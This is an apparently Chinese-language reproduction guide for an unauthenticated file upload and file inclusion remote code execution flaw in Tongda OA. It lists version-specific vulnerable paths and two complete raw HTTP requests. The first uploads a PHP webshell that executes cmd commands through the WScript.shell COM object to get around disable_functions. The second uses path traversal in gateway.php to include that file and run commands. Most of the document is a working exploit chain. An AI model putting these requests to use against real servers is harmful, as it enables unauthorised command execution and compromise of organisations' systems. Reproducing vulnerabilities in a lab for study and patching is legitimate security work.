通达OA未授权文件上传+文件包含RCE 复现

环境搭建：

通达OA下载：https://www.tongda2000.com/download/2019.php

由于此版本已经修复，需要下载两个文件进行覆盖。

漏洞文件下载：https://github.com/jas502n/OA-tongda-RCE

 

 

 注意：版本不同路径不同

2013：
文件上传路径：/ispirit/im/upload.php
文件包含路径：/ispirit/interface/gateway.php
2017：
文件上传路径：/ispirit/im/upload.php
文件包含路径：/mac/gateway.php

 

登陆处抓取数据包

 

 

 

改包==》文件上传

改成POST方法提交，Content-Type改为multipart/form-data

在windows下可以通过加载com组件来绕过disable_function

 

文件上传数据包

POST /ispirit/im/upload.php HTTP/1.1
Host: 192.168.61.135
Content-Type: multipart/form-data; boundary=--------1671563870
Content-Length: 565

----------1671563870
Content-Disposition: form-data; name="ATTACHMENT"; filename="11111.txt"
Content-Type: text/plain

<?php
$command=$_GET['cmd'];
$wsh = new COM('WScript.shell'); 
$exec = $wsh->exec("cmd /c ".$command); 
$stdout = $exec->StdOut();
$stroutput = $stdout->ReadAll();
echo $stroutput;
?>
----------1671563870
Content-Disposition: form-data; name="P"

admin
----------1671563870
Content-Disposition: form-data; name="DEST_UID"

0
----------1671563870
Content-Disposition: form-data; name="UPLOAD_MODE"

2
----------1671563870--

改包==》文件包含+命令执行数据包

 

 注意文件上传的路径：

POST /ispirit/interface/gateway.php?cmd=ipconfig HTTP/1.1
Host: 192.168.61.135
Content-Length: 80
Cache-Control: max-age=0
Origin: http://192.168.61.135
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.61.135/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=e0d29a06; PHPSESSID=o49g78mv6n6pqvcsanbksd7p91; KEY_RANDOMDATA=17363
Connection: close

json={"url":"ispirit/im/../../../../../MYOA/attach/im/2003/530118684.11111.txt"}